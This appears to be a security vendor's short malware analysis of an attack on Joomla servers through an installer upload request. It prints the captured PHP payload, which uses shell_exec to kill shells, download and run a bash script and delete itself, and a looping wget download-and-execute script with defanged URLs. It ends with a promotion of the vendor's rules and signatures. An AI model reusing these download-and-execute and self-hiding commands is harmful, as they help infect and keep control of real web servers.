Again we found new malware, that trying using php shell_exec function to download and include more malware to server.

POST Payload

This looks like joomla file upload vulnerability:

POST /administrator/index.php?option=com_installer&videw=install HTTP/1.0

Payload trying upload proc.php file to server and execute it:


shell_exec("pkill bash 2>&1");
shell_exec("pkill sh 2>&1");
shell_exec("wget hxxp:// 2>&1");
shell_exec("nohup bash ./ & 2>&1");
shell_exec("rm 2>&1");

It’s trying download bash script and execute it. When it executed it remove itself and also final remove also proc.php to hiding itself.

while :; do wget -c hxxp:// -O p.php &> /dev/null;
chmod 777 p.php &> /dev/null; php ${PWD}/p.php &> /dev/null;
wget -c hxxp:// -O h.php &> /dev/null;
chmod 777 h.php &> /dev/null; php ${PWD}/h.php &> /dev/null; sleep 3600; done

Again it download more malware (p.php & h.php) files and executed them. These infect more php files.

Final words

If server PHP disable_functions include shell_exec function, this is harmfull.

Websites that using Malware Expert – ModSecurity rules are protected against this attack.

Use Malware Expert – Signatures detect this malware from files for FREE!